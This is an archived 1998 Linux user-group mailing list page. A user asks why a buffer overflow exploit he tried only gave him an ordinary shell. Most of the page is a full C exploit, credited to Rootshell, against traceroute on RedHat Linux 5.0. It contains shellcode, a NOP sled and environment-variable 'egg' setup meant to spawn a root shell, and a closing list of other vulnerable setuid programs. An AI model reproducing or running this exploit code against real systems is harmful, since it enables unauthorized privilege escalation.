Mailing List Archive

Support open source code!


[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

tlug: Security naive question!



Hi, I's reading about security on buffer overflow, and could manage to
find out how this kind of error may give root access to regular user...a
program I folowed line-to-line to try gainning root on my machine simple
opened a usual shell, no previleges!

[]'s
    RCT

                         Please visit our sponsors.
                                      
   Return to index | Download NON-HTML Version | Add Comment | View
   Comments (0 comment(s))

/*

[ http://www.rootshell.com/ ]

   Just Your Standard EGGSHELL Proggie:
   traceroute buffer overflow exploit for RedHat Linux 5.0
   mostly ripped from Aleph One <aleph1@example.com>

   Wilton Wong
   wwong@example.com

   gcc -o trace_shell trace_shell.c

*/
#include <stdlib.h>

#define DEFAULT_OFFSET                 0
#define DEFAULT_BUFFER_SIZE            1019
#define DEFAULT_EGG_SIZE               2048
#define NOP                            0x90

char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr, *egg;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i, eggsize=DEFAULT_EGG_SIZE;

  if (argc > 1) bsize  = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);
  if (argc > 3) eggsize = atoi(argv[3]);

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }
  if (!(egg = malloc(eggsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = get_sp() - offset;
  printf("Using address: 0x%x\n", addr);

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  ptr = egg;
  for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
    *(ptr++) = NOP;

  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';
  egg[eggsize - 1] = '\0';

  memcpy(egg,"EGG=",4);
  putenv(egg);
  memcpy(buff,"RET=",4);
  putenv(buff);
  printf("Now run: /usr/sbin/traceroute $RET\n");
  system("/bin/bash");
}






-------------------------------------------------------------------------


On Redhat 5.0,

There are also vunerable to buffer overruns in:

/usr/bin/rlogin
/usr/bin/rsh
/usr/sbin/ping
     _________________________________________________________________
   
   © 1998 Rootshell - Unauthorized duplication prohibited.

Home | Main Index | Thread Index

Home Page Mailing List Linux and Japan TLUG Members Links